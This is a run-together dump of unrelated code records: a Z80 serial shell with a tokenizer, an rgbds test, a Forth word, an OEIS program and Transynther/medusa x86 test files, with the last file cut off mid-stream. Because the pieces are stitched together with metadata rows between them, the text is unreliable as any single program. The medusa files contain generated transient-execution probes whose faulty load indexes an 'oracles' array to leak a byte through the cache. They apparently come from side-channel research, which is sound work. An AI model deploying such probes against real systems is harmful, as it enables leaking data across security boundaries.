;Disable All Interrupts
LD A, 0
OUT UART_IER, A
;FIFO Enable
LD A, 1
OUT UART_IFR, A
;Line Control
LD A, 03h ;8 Bit word, 1 stop, no parity
OUT UART_LCR, A
;Set OUT pins Low (as an indicator)
LD A, 0Ch
OUT UART_MCR, A
;Set DLAB=1
IN A, UART_LCR
OR 80h
OUT UART_LCR, A
;Divide Clock by 6 for 19200 baud (Assuming 1.7MHz clock)
LD A, 6
OUT UART_DHR, A
LD A, 0
OUT UART_IER, A
;Return
POP AF
RET
;//////////////////////////////////////
;Get a character from the FIFO, add to write buffer and echo to screen
;//////////////////////////////////////
GETCH:
PUSH AF
PUSH BC
;Set DLAB 0
IN A, UART_LCR
AND 7Fh
OUT UART_LCR, A
GETCH_LOOP:
;Read Line Status Reg
IN A, UART_LSR
;Only care about bit 0
AND 1
;If bit 0 is a 1 then FIFO has new data
CP 1
;Jump to end if bit 0 was a 0
JP NZ, GETCH_END
;Get next char from data holding register
IN A, UART_DHR
CALL WRITE_BUFFER
JP GETCH_LOOP
GETCH_END:
POP BC
POP AF
RET
;///////////////////////////////////////
;Write a charactar to the terminal buffer, and echo to screen
;expects A to be the character
;//////////////////////////////////////
WRITE_BUFFER:
PUSH AF
PUSH BC
PUSH DE
;Save character in D
LD D, A
;Load address of terminal buffer
LD BC, TERM_BUF
;Get size of terminal buffer
LD A, (BC)
;Add 1
INC A
;Write new length to start of buffer
LD (BC), A
;Add A and C for new offset (C should be 0 but just in case)
ADD A, C
;Put A into C
LD C, A
;Put char back into A
LD A, D
;Write to buffer
LD (BC), A
CALL PRINTCH
POP DE
POP BC
POP AF
RET
;/////////////////////////////////////////
;Assumes that A is the charactar to write
;/////////////////////////////////////////
PRINTCH:
PUSH AF
;Set DLAB 0
IN A, UART_LCR
AND 7Fh
OUT UART_LCR, A
;TODO: read transmit register status? Page 22
;Write Char to UART
OUT UART_DHR, A
POP AF
RET
;////////////////////////////////////////
;Writes a string via IO
;Disables Interrupts while running
;Expects HL to be the address of a string
;////////////////////////////////////////
WRITE_STR:
DI
PUSH AF
PUSH HL
;Set DLAB 0
IN A, UART_LCR
AND 7Fh
OUT UART_LCR, A
;Loop over each char in string
WRITE_START:
LD A, (HL)
CP 0 ;Is it EOF?
JP Z, WRITE_CLOSE
CALL PRINTCH
INC HL
JP WRITE_START
WRITE_CLOSE:
POP HL
POP AF
EI
ret
;Main function to tokenize, parse, and execute user entered expressions
;Assume AF has return values
EVALUATE_STMT:
PUSH AF
;Tokenizes and checks for invalid characters
CALL TOKENIZE_BUFFER
CP 0xFF
JP Z, EVALUATE_STMT_TOKEN_FAIL
;Checks syntax and prepares for execution
CALL PARSE_BUFFER
CP 0xFF
JP Z, EVALUATE_STMT_SYNTAX_FAIL
;Execute the commands found in the buffer
CALL EXECUTE_BUFFER
CP 0xFF
JP Z, EVALUATE_STMT_EXE_FAIL
;If all three functions return then jump to end
JP EVALUATE_STMT_RETURN
EVALUATE_STMT_TOKEN_FAIL:
;Print invalid token string
LD HL, TOKEN_ERROR
CALL WRITE_STR
JP EVALUATE_STMT_RETURN
EVALUATE_STMT_SYNTAX_FAIL:
;Print syntax error string
LD HL, SYNTAX_ERROR
CALL WRITE_STR
JP EVALUATE_STMT_RETURN
EVALUATE_STMT_EXE_FAIL:
;Print error string
LD HL, EXE_ERROR
CALL WRITE_STR
EVALUATE_STMT_RETURN:
POP AF
RET
;////////////////////////////////////////////////////////////////
;There are 5 types of symbols - LITERAL, @, :, <, ?
;Returns status in register A
;0x00 - Good
;0xFF - Bad
;////////////////////////////////////////////////////////////////
;Buffer for tokens, first byte is size of buffer
TOKEN_BUF equ 0x8110
;Token Symbols in token buffer
TOKEN_EF equ 0 ;End of buffer size 1
TOKEN_LT equ 1 ;ABCDEF0123456789 size 2
TOKEN_EX equ 2 ;@ size 1
TOKEN_RD equ 3 ;: size 1
TOKEN_WR equ 4 ;< size 1
TOKEN_HE equ 5 ;? size 1
TOKEN_WD equ 6 ;Full Word, size 3
;////////////////////////////////////////////////////////////////
TOKENIZE_BUFFER:
PUSH BC
PUSH DE
;Clear parse buffer
LD DE, TOKEN_BUF
LD A, 0
LD (DE), A
;Get start of terminal buffer
LD DE, TERM_BUF
;For instruction tokens or newlines
;Load the token code into C and pass that to the tokenize function
;If its a hex letter or number
;The value is in B already and the tokenize function expects that
;Basically, for every byte in the buffer:
;is it a newline? if so then exit
;is it a number? if so then convert to hex and tokenize
;is it a a hex char? convert to hex and tokenize
;is it an instruction? put the propper token
;is it whitespace? ignore
TOKENIZE_BUFFER_LOOP:
;Get next character
INC DE
LD A, (DE)
;Save character
LD B, A
;/////////////////////
;Check if return
;/////////////////////
LD C, TOKEN_EF
CP NEWLINE
CALL Z, TOKENIZE_INSTR
;Return to start of loop if return is FF
CP 0xFF
JP Z, TOKENIZE_BUFFER_RETURN_SUCCESS
;/////////////////////
;Check if a number
;/////////////////////
SUB 0x30
CP 0xA
CALL C, TOKENIZE_NUMBERS
;Return to start of loop if return is FF
CP 0xFF
JP Z, TOKENIZE_BUFFER_LOOP
;Return original character
LD A, B
;/////////////////////
;Check if a hex character
;/////////////////////
SUB 0x41
CP 0x6
CALL C, TOKENIZE_CHAR
;Return to start of loop if return is FF
CP 0xFF
JP Z, TOKENIZE_BUFFER_LOOP
;Return original character
LD A, B
;/////////////////////
;Check if a ?
;/////////////////////
LD C, TOKEN_HE
CP SYM_HELP
CALL Z, TOKENIZE_INSTR
;Return to start of loop if return is FF
CP 0xFF
JP Z, TOKENIZE_BUFFER_LOOP
;Return original character
LD A, B
;/////////////////////
;Check if a :
;/////////////////////
LD C, TOKEN_RD
CP SYM_READ
CALL Z, TOKENIZE_INSTR
;Return to start of loop if return is FF
CP 0xFF
JP Z, TOKENIZE_BUFFER_LOOP
;Return original character
LD A, B
;/////////////////////
;Check if a <
;/////////////////////
LD C, TOKEN_WR
CP SYM_WRITE
CALL Z, TOKENIZE_INSTR
;Return to start of loop if return is FF
CP 0xFF
JP Z, TOKENIZE_BUFFER_LOOP
;Return original character
LD A, B
;/////////////////////
;Check if a @
;/////////////////////
LD C, TOKEN_EX
CP SYM_EXE
CALL Z, TOKENIZE_INSTR
;Return to start of loop if return is FF
CP 0xFF
JP Z, TOKENIZE_BUFFER_LOOP
;/////////////////////
;Check if whitespace (ignore) (maybe shouldn't ignore?)
;/////////////////////
CP 0x20
JP Z, TOKENIZE_BUFFER_LOOP
;If the program gets to this point there is an error
LD A, 0xFF
JP TOKENIZE_BUFFER_RETURN
;Return
TOKENIZE_BUFFER_RETURN_SUCCESS:
;Signal that the program returned successful!
LD A, 00
TOKENIZE_BUFFER_RETURN:
POP DE
POP BC
RET
;Expects C to be the token value
;Return 0xFF in A when complete
TOKENIZE_INSTR:
PUSH BC
PUSH DE
PUSH HL
;Get size of token buffer
LD HL, TOKEN_BUF
LD A, (HL)
;Save in D
LD D, A
;Increment token buffer size
INC A
LD (HL), A
;Add the new size to the pointer so that it points to the next open spot
LD A, D
ADD A, L
INC A
LD L, A
;Put Instruction Token at the next open spot
LD (HL), C
INC L ;TODO: ???
POP HL
POP DE
POP BC
LD A, 0xFF
RET
;Expects B to hold next char value
;Write token symbol and value (if needed) to TOKEN_BUF
TOKENIZE_NUMBERS:
PUSH BC
PUSH DE
PUSH HL
;Get size of token buffer
LD HL, TOKEN_BUF
LD A, (HL)
;Save in C
LD C, A
;Increment by 2
ADD A, 2
LD (HL), A
;Add size to the buffer pointer to get the next available spot
LD A, C
ADD A, L
INC A
LD L, A
;Put Number Token
LD (HL), TOKEN_LT
INC L
;Put Token Value
LD A, B
SUB 0x30
LD (HL), A
POP HL
POP DE
POP BC
LD A, 0xFF
RET
;Expects B to be the Char value
;Write token symbol and value to TOKEN_BUF
TOKENIZE_CHAR:
PUSH BC
PUSH DE
PUSH HL
;Get size of token buffer
LD HL, TOKEN_BUF
LD A, (HL)
;Save in C
LD C, A
;Increment by 2
ADD A, 2
LD (HL), A
;Goto next free spot
LD A, C
ADD A, L
INC A
LD L, A
;Put Number Token
LD (HL), TOKEN_LT
INC L
;Put Token Value
LD A, B
SUB 0x37
LD (HL), A
POP HL
POP DE
POP BC
LD A, 0xFF
RET
;TODO: Can this just write over the other buffers?
;Buffer for Parser
PARSE_RAM equ 0x8200
;Current and next token for parser
PARSE_CUR equ 0x8200
PARSE_NEXT equ 0x8201
;Location of state for FSM
PARSE_STATE equ 0x8202
;Incrementor location for parser
PARSE_INC equ 0x8203
;High and low values for literals
PARSE_LIT_H equ 0x8204
PARSE_LIT_L equ 0x8205
PARSE_BUF equ 0x8210
;This should organize each token into a fully readable form
;I'm using the term 'Parse' very loosely
;Return 0x00 on success
PARSE_BUFFER:
PUSH BC
PUSH DE
PUSH HL
;Get start of token buffer
LD HL, TOKEN_BUF
;Get size of buffer
LD A, (HL)
;Return if its empty
CP 0
JP Z, PARSE_BUFFER_RETUN_SUCCESS
;Clear literal storage
LD HL, PARSE_LIT_L
LD (HL), 0
LD HL, PARSE_LIT_H
LD (HL), 0
;Set state to be start
LD HL, PARSE_STATE
LD (HL), STATE_START
;Set size of buffer to be 0
LD HL, PARSE_BUF
LD (HL), 0
;Set incrementor
LD HL, PARSE_INC
LD (HL), 1
PARSE_BUFFER_LOOP:
;Get incrementor
LD HL, PARSE_INC
LD A, (HL)
;Go to next location in token buffer
LD HL, TOKEN_BUF
ADD A, L
LD L, A
;Get Token, save to A and B
LD A, (HL)
LD B, A
;Check if its the end of the buffer
CP TOKEN_EF
CALL Z, PARSE_INST
CP 0xFF
JP Z, PARSE_BUFFER_RETUN_SUCCESS
;Check if current token is a single literal value
CP TOKEN_LT
CALL Z, PARSE_LITERAL
CP 0xFF
JP Z, PARSE_BUFFER_LOOP
;Check if current token is an @ symbol
CP TOKEN_EX
CALL Z, PARSE_INST
CP 0xFF
JP Z, PARSE_BUFFER_LOOP
;Check if current token is an : symbol
CP TOKEN_RD
CALL Z, PARSE_INST
CP 0xFF
JP Z, PARSE_BUFFER_LOOP
;Check if current token is an < symbol
CP TOKEN_WR
CALL Z, PARSE_INST
CP 0xFF
JP Z, PARSE_BUFFER_LOOP
;Check if current token is an ? symbol
CP TOKEN_HE
CALL Z, PARSE_INST
CP 0xFF
JP Z, PARSE_BUFFER_LOOP
;If parser reaches this point there is an invalid token
LD A, 0xFF
JP PARSE_BUFFER_RETURN
PARSE_BUFFER_RETUN_SUCCESS:
LD A, 0x00
PARSE_BUFFER_RETURN:
POP HL
POP DE
POP BC
RET
;HL should be location of next token
;A should be the token
PARSE_LITERAL:
PUSH BC
PUSH DE
PUSH HL
PARSE_LITERAL_LOOP:
;Check if this is a literal token
;TODO jump to an error state, not save
CP TOKEN_LT
JP NZ, PARSE_LITERAL_SAVE
;The goal of this next section is to shift the current token into two 8 bit values to create a single 16 bit value
;This is horrible and ugly but im too tired to make it better right now
;Get value
INC L
LD A, (HL)
;Save HL for later
PUSH HL
;Save value into E
LD E, A
;Get high literal value
LD HL, PARSE_LIT_H
LD A, (HL)
;Rotate A by 4 to the left (may have to rotate 5 times?) so now low bytes are high
RLCA
RLCA
RLCA
RLCA
;Zero out lower bytes
AND 0xF0
;Save rotated high byte into B
LD B, A
;Get Low literal value
LD HL, PARSE_LIT_L
LD A, (HL)
;Rotate A by 4 to the left (so now low and high bytes are swapped)
RLCA
RLCA
RLCA
RLCA
;Save into C
LD C, A
;Zero out high bytes
AND 0x0F
;Now A should contain the HIGH byte
OR B
LD HL, PARSE_LIT_H
LD (HL), A
;Now get the value of the token
LD A, C
;Put the new token (stored in E) into the low bytes of A
AND 0xF0
OR E
;Save
LD HL, PARSE_LIT_L
LD (HL), A
;Get TOKEN incrementor
LD HL, PARSE_INC
LD A, (HL)
ADD A, 2
LD (HL), A
;Increment pointer and return to start
POP HL
INC L
LD A, (HL)
JP PARSE_LITERAL_LOOP
PARSE_LITERAL_SAVE:
;First, save this token and the full value
;Get size of parse buffer
;HL Holds the location of the next (non literal) token
PUSH HL
LD HL, PARSE_BUF
LD A, (HL)
;Go to next empty spot
ADD A, L
INC A
LD L, A
;First put word token
LD (HL), TOKEN_WD
INC L
;Next Put High Byte
LD DE, PARSE_LIT_H
LD A, (DE)
LD (HL), A
INC L
;Next put low byte
LD DE, PARSE_LIT_L
LD A, (DE)
LD (HL), A
INC L
;Go back to start of buffer, get size
LD HL, PARSE_BUF
LD A, (HL)
;Increment by size of token
ADD A, 0x3
LD (HL), A
POP HL
PARSE_LITERAL_RETURN_SUCCESS:
LD A, 0xFF
PARSE_LITERAL_RETURN:
POP HL
POP DE
POP BC
RET
;A should just be the instruciton token, no additional work needed
PARSE_INST:
PUSH BC
PUSH DE
PUSH HL
;Save token into B
LD B, A
LD HL, PARSE_BUF
LD A, (HL)
;Go to next empty spot
ADD A, L
INC A
LD L, A
;Put token
LD (HL), B
;Go back to start of buffer, get size
LD HL, PARSE_BUF
LD A, (HL)
;Increment by size of token
INC A
LD (HL), A
;Update TOKEN incrementor
LD HL, PARSE_INC
LD A, (HL)
INC A
LD (HL), A
;Set return value
LD A, 0xFF
POP HL
POP DE
POP BC
RET
;STATES:
STATE_START equ 0 ;Start State
STATE_HELP equ 1 ;? Symbol
STATE_EXE equ 2 ;@ Symbol
STATE_LIEX equ 3 ;Literal following @
STATE_LIT equ 4 ;Leftmost literal (branches)
STATE_READ equ 5 ;Read :
STATE_WRITE equ 6 ;Write <
STATE_LITRD equ 7 ;Literal following :
STATE_LITWR equ 8 ;Literal following <
EXE_RAM equ 0x8300
EXE_STATE equ 0x8301
EXE_INC equ 0x8302
EXE_BUF equ 0x8310
EXECUTE_BUFFER:
PUSH BC
PUSH DE
PUSH HL
;Set state
LD HL, EXE_STATE
LD (HL), STATE_START
;Set incrementor
LD HL, EXE_INC
LD (HL), 1
EXECUTE_BUFFER_LOOP:
;Pingas
;Get incrementor
LD HL, EXE_INC
LD A, (HL)
;Go to next token
LD HL, PARSE_BUF
ADD A, L
LD L, A
;Get token, Save copy to B
LD A, (HL)
LD B, A
;Check if its the end of the buffer
CP TOKEN_EF
CALL Z, EVAL_EOF
CP 0xFF
JP Z, EXECUTE_BUFFER_RETUN_SUCCESS
;Check if current token is a single literal value
CP TOKEN_LT
CALL Z, EVAL_LITERAL
CP 0xFF
JP Z, EXECUTE_BUFFER_LOOP
;Check if current token is an @ symbol
CP TOKEN_EX
CALL Z, EVAL_EXE
CP 0xFF
JP Z, EXECUTE_BUFFER_LOOP
;Check if current token is an : symbol
CP TOKEN_RD
CALL Z, EVAL_READ
CP 0xFF
JP Z, EXECUTE_BUFFER_LOOP
;Check if current token is an < symbol
CP TOKEN_WR
CALL Z, EVAL_WRITE
CP 0xFF
JP Z, EXECUTE_BUFFER_LOOP
;Check if current token is an ? symbol
CP TOKEN_HE
CALL Z, EVAL_HELP
CP 0xFF
JP Z, EXECUTE_BUFFER_LOOP
;If parser reaches this point there is an invalid token
LD A, 0xFF
JP EXECUTE_BUFFER_RETURN
EXECUTE_BUFFER_RETUN_SUCCESS:
LD A, 0x00
EXECUTE_BUFFER_RETURN:
POP HL
POP DE
POP BC
RET
EVAL_EOF:
RET
EVAL_LITERAL:
RET
EVAL_EXE:
RET
EVAL_READ:
RET
EVAL_WRITE:
RET
EVAL_HELP:
RET
;//////////////////////
;/////////DATA/////////
;//////////////////////
BOOT_MSG:
.db NEWLINE, RETURN, "ASH v0.03", NEWLINE, RETURN, "(C) 2020 by Aidan Jennings"
.db NEWLINE, RETURN, "ZILOG Z80 32k EEPROM, 32k SRAM", NEWLINE, RETURN, "TEXT ONLY", EOF
READY_MSG:
.db NEWLINE, RETURN, "BOOT PROCESS COMPLETE!", NEWLINE, RETURN, EOF
SYNTAX_ERROR:
.db NEWLINE, RETURN, "SYNTAX ERROR", NEWLINE, RETURN, EOF
TOKEN_ERROR:
.db NEWLINE, RETURN, "INVALID TOKEN", NEWLINE, RETURN, EOF
EXE_ERROR:
.db NEWLINE, RETURN, "EXECUTION ERROR", NEWLINE, RETURN, EOF
PROMPT:
.db RETURN, ">>>:", EOF
org 8001h
;.db "A0:7F", NEWLINE
.db "A8F4<B7", NEWLINE
;.db "@B800"
| 20.546099
| 122
| 0.559101
|
aa535f9b813c917f80d88821ed1a7fc329235b1d
| 4,514
|
asm
|
Assembly
|
Transynther/x86/_processed/AVXALIGN/_st_/i7-8650U_0xd2_notsx.log_2849_742.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 9
|
2020-08-13T19:41:58.000Z
|
2022-03-30T12:22:51.000Z
|
Transynther/x86/_processed/AVXALIGN/_st_/i7-8650U_0xd2_notsx.log_2849_742.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 1
|
2021-04-29T06:29:35.000Z
|
2021-05-13T21:02:30.000Z
|
Transynther/x86/_processed/AVXALIGN/_st_/i7-8650U_0xd2_notsx.log_2849_742.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 3
|
2020-07-14T17:07:07.000Z
|
2022-03-21T01:12:22.000Z
|
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x1add8, %rbp
nop
nop
nop
nop
nop
inc %rdi
movw $0x6162, (%rbp)
nop
nop
nop
sub $17321, %rsi
lea addresses_D_ht+0x1cc38, %r10
nop
nop
nop
dec %rcx
mov $0x6162636465666768, %rbp
movq %rbp, %xmm7
vmovups %ymm7, (%r10)
nop
nop
nop
sub %rsi, %rsi
lea addresses_D_ht+0x1a8f8, %r11
nop
inc %rsi
mov (%r11), %cx
nop
nop
and $146, %rsi
pop %rsi
pop %rdi
pop %rcx
pop %rbp
pop %r11
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r13
push %r8
push %r9
push %rax
push %rbp
// Faulty Load
lea addresses_PSE+0x1b918, %r9
nop
nop
nop
nop
nop
xor $5347, %rbp
movb (%r9), %r8b
lea oracles, %rax
and $0xff, %r8
shlq $12, %r8
mov (%rax,%r8,1), %r8
pop %rbp
pop %rax
pop %r9
pop %r8
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_PSE', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_PSE', 'size': 1, 'AVXalign': False, 'NT': True, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 5, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_D_ht', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 5, 'same': False}}
{'33': 2849}
33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
*/
| 50.719101
| 2,999
| 0.660611
|
1598d43aee8a2d8312141acb8129af3dfe7ae6a6
| 356
|
asm
|
Assembly
|
test/asm/redef-equ.asm
|
michealccc/rgbds
|
b51e1c7c2c4ce2769f01e016967d0115893a7a88
|
[
"MIT"
] | 522
|
2017-02-25T21:10:13.000Z
|
2020-09-13T14:26:18.000Z
|
test/asm/redef-equ.asm
|
michealccc/rgbds
|
b51e1c7c2c4ce2769f01e016967d0115893a7a88
|
[
"MIT"
] | 405
|
2017-02-25T21:32:37.000Z
|
2020-09-13T16:43:29.000Z
|
test/asm/redef-equ.asm
|
michealccc/rgbds
|
b51e1c7c2c4ce2769f01e016967d0115893a7a88
|
[
"MIT"
] | 84
|
2017-02-25T21:10:26.000Z
|
2020-09-13T14:28:25.000Z
|
DEF n EQU 0
REDEF n EQU 1
; prints "$1"
PRINTLN n
list: MACRO
LIST_NAME EQUS "\1"
DEF LENGTH_{LIST_NAME} EQU 0
ENDM
item: MACRO
REDEF LENGTH_{LIST_NAME} EQU LENGTH_{LIST_NAME} + 1
DEF {LIST_NAME}_{d:LENGTH_{LIST_NAME}} EQU \1
ENDM
list SQUARES
item 1
item 4
item 9
println LENGTH_SQUARES, SQUARES_1, SQUARES_2, SQUARES_3
N EQUS "X"
REDEF N EQU 42
| 14.833333
| 56
| 0.735955
|
192a4195432ca09f5c1d3bff834301de7e6193f9
| 84
|
asm
|
Assembly
|
data/maps/headers/CeruleanTrashedHouse.asm
|
opiter09/ASM-Machina
|
75d8e457b3e82cc7a99b8e70ada643ab02863ada
|
[
"CC0-1.0"
] | 1
|
2022-02-15T00:19:44.000Z
|
2022-02-15T00:19:44.000Z
|
data/maps/headers/CeruleanTrashedHouse.asm
|
opiter09/ASM-Machina
|
75d8e457b3e82cc7a99b8e70ada643ab02863ada
|
[
"CC0-1.0"
] | null | null | null |
data/maps/headers/CeruleanTrashedHouse.asm
|
opiter09/ASM-Machina
|
75d8e457b3e82cc7a99b8e70ada643ab02863ada
|
[
"CC0-1.0"
] | null | null | null |
map_header CeruleanTrashedHouse, CERULEAN_TRASHED_HOUSE, HOUSE, 0
end_map_header
| 21
| 66
| 0.857143
|
cc6cdd5ab4ea84920494ec0ac406b2a4720a98e3
| 168
|
asm
|
Assembly
|
core/words/setcursor.asm
|
paulscottrobson/nextForth
|
3725af76cedd403e1e468fc8392e819fc0feb744
|
[
"MIT"
] | 2
|
2019-02-17T02:39:13.000Z
|
2020-06-10T09:57:22.000Z
|
core/words/setcursor.asm
|
paulscottrobson/nextForth
|
3725af76cedd403e1e468fc8392e819fc0feb744
|
[
"MIT"
] | 1
|
2019-03-03T20:40:02.000Z
|
2020-07-02T09:39:48.000Z
|
core/words/setcursor.asm
|
paulscottrobson/nextForth
|
3725af76cedd403e1e468fc8392e819fc0feb744
|
[
"MIT"
] | null | null | null |
;
; Word: cursor!
; Dictionary: (a - )
; Date: 4th February 2018
; Macro: No
; Notes:
;
pop ix
ex de,hl
call IO_SetCursor
pop de
jp (ix)
| 11.2
| 28
| 0.52381
|
ff15767ec45c97b71094a5d173d72e4ccc4e9ae9
| 505
|
asm
|
Assembly
|
oeis/212/A212058.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/212/A212058.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/212/A212058.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A212058: Number of (w,x,y,z) with all terms in {1,...,n} and w>=x*y*z.
; Submitted by Jamie Morken(w3)
; 0,1,5,12,25,41,66,94,132,176,229,285,359,436,522,617,727,840,971,1105,1257,1418,1588,1761,1964,2173,2391,2619,2865,3114,3390,3669,3969,4278,4596,4923,5286,5652,6027,6411,6825,7242,7686,8133,8598
mov $1,$0
mov $3,$0
add $3,1
lpb $3
mov $0,$1
sub $3,1
sub $0,$3
seq $0,7425 ; d_3(n), or tau_3(n), the number of ordered factorizations of n as n = r s t.
mul $0,$3
add $2,$0
lpe
mov $0,$2
| 29.705882
| 196
| 0.651485
|
0e67fbe9cd4b229471115f8fc9611fa0cb8d0cd5
| 6,487
|
asm
|
Assembly
|
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_77.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 9
|
2020-08-13T19:41:58.000Z
|
2022-03-30T12:22:51.000Z
|
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_77.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 1
|
2021-04-29T06:29:35.000Z
|
2021-05-13T21:02:30.000Z
|
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_77.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 3
|
2020-07-14T17:07:07.000Z
|
2022-03-21T01:12:22.000Z
|
.global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r13
push %r15
push %r8
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0x82f, %rsi
lea addresses_UC_ht+0x17841, %rdi
nop
cmp %r13, %r13
mov $0, %rcx
rep movsb
nop
nop
nop
nop
add $7350, %r8
lea addresses_WT_ht+0x1b741, %rsi
lea addresses_UC_ht+0x15c71, %rdi
nop
nop
nop
nop
xor %r12, %r12
mov $44, %rcx
rep movsw
nop
nop
nop
nop
nop
xor $49513, %rdi
lea addresses_D_ht+0x1def5, %r13
nop
nop
nop
dec %r15
movl $0x61626364, (%r13)
nop
nop
and %r15, %r15
lea addresses_WC_ht+0x4289, %rsi
nop
nop
nop
lfence
movb $0x61, (%rsi)
nop
xor %rdi, %rdi
lea addresses_WC_ht+0xc001, %rsi
lea addresses_WT_ht+0x11a29, %rdi
inc %rbx
mov $94, %rcx
rep movsl
nop
nop
nop
nop
xor $23041, %r15
lea addresses_UC_ht+0x1ad41, %rsi
lea addresses_D_ht+0x18d41, %rdi
nop
nop
nop
nop
nop
and %r15, %r15
mov $28, %rcx
rep movsb
nop
nop
nop
nop
nop
add %rbx, %rbx
lea addresses_normal_ht+0x1cb41, %r13
add $39987, %r15
